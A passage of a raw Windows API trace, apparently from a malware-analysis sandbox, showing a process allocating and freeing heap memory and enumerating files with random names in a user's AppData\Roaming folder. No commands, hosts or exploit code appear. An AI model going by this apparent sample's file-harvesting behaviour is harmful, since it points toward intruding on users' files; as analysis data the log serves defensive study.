hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0216.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0216.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0216.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0216.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0216.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0216.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0216.916] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0216.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0216.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0216.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0216.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0216.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0216.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0216.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0216.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0216.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e56440 [0216.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0216.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0216.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0216.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0216.917] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming\\*.*", lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xe748c38b, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe748c38b, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x26, dwReserved1=0x8cf2d0, cFileName=".", cAlternateFileName="")) returned 0xa87710 [0216.917] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xe748c38b, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe748c38b, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x26, dwReserved1=0x8cf2d0, cFileName="..", cAlternateFileName="")) returned 1 [0216.917] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fec6fb0, ftCreationTime.dwHighDateTime=0x1d5e79d, ftLastAccessTime.dwLowDateTime=0x68244cb0, ftLastAccessTime.dwHighDateTime=0x1d5e4c4, ftLastWriteTime.dwLowDateTime=0x68244cb0, ftLastWriteTime.dwHighDateTime=0x1d5e4c4, nFileSizeHigh=0x0, nFileSizeLow=0xf038, dwReserved0=0x26, dwReserved1=0x8cf2d0, cFileName="-ZbS9.pps", cAlternateFileName="")) returned 1 [0216.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0216.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0216.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56440 | out: hHeap=0x970000) returned 1 [0216.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0216.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0216.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0216.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0216.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0216.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0216.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0216.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0216.917] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0216.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0216.917] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0216.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0216.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0216.918] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0216.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0216.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0216.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0216.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0216.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0216.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0216.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0216.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0216.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0216.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0216.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0216.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0216.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0216.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0216.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0216.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0216.918] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0216.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0216.918] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0216.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0216.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0216.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0216.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0216.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0216.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0216.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0216.919] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0216.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0216.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0216.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0216.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0216.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0216.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0216.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0216.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0216.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0216.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0216.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0216.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0216.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0216.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0216.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0216.919] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0216.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0216.919] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0216.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0216.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0216.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0216.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0216.919] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x860832e0, ftCreationTime.dwHighDateTime=0x1d5e182, ftLastAccessTime.dwLowDateTime=0x6d365f20, ftLastAccessTime.dwHighDateTime=0x1d5e2dc, ftLastWriteTime.dwLowDateTime=0x6d365f20, ftLastWriteTime.dwHighDateTime=0x1d5e2dc, nFileSizeHigh=0x0, nFileSizeLow=0x119e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="0lKdr4kmMec0.mp3", cAlternateFileName="0LKDR4~1.MP3")) returned 1 [0216.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0216.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0216.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0216.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0216.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0216.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0216.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0216.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0216.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0216.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0216.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0216.920] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0216.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0216.920] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0216.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0216.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0216.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0216.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0216.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0216.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0216.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0216.920] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0216.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0216.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0216.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0216.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0216.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0216.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0216.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0216.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0216.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0216.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0216.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56440 [0216.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0216.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0216.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0216.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0216.921] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0216.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0216.921] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0216.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0216.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0216.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0216.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0216.921] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8887a660, ftCreationTime.dwHighDateTime=0x1d5eeaa, ftLastAccessTime.dwLowDateTime=0x448120a0, ftLastAccessTime.dwHighDateTime=0x1d5edbe, ftLastWriteTime.dwLowDateTime=0x448120a0, ftLastWriteTime.dwHighDateTime=0x1d5edbe, nFileSizeHigh=0x0, nFileSizeLow=0xca26, dwReserved0=0x0, dwReserved1=0x0, cFileName="3P0loyjD.docx", cAlternateFileName="3P0LOY~1.DOC")) returned 1 [0216.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0216.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0216.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0216.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0216.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0216.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0216.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0216.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0216.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0216.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0216.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0216.921] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0216.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0216.922] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0216.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0216.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0216.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0216.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0216.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0216.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0216.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0216.922] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0216.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0216.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0216.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0216.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0216.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0216.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0216.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0216.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0216.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0216.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0216.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0216.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0216.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0216.922] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0216.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0216.922] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0216.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0216.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0216.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0216.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0216.923] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd10fad70, ftCreationTime.dwHighDateTime=0x1d5e3e1, ftLastAccessTime.dwLowDateTime=0xe84d9660, ftLastAccessTime.dwHighDateTime=0x1d5ec2d, ftLastWriteTime.dwLowDateTime=0xe84d9660, ftLastWriteTime.dwHighDateTime=0x1d5ec2d, nFileSizeHigh=0x0, nFileSizeLow=0x8343, dwReserved0=0x0, dwReserved1=0x0, cFileName="6KDjX0CerhkJtgMw88.mp3", cAlternateFileName="6KDJX0~1.MP3")) returned 1 [0216.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0216.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0216.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0216.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0216.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0216.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0216.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0216.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0216.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0216.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0216.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0216.923] PeekMessageW (in: 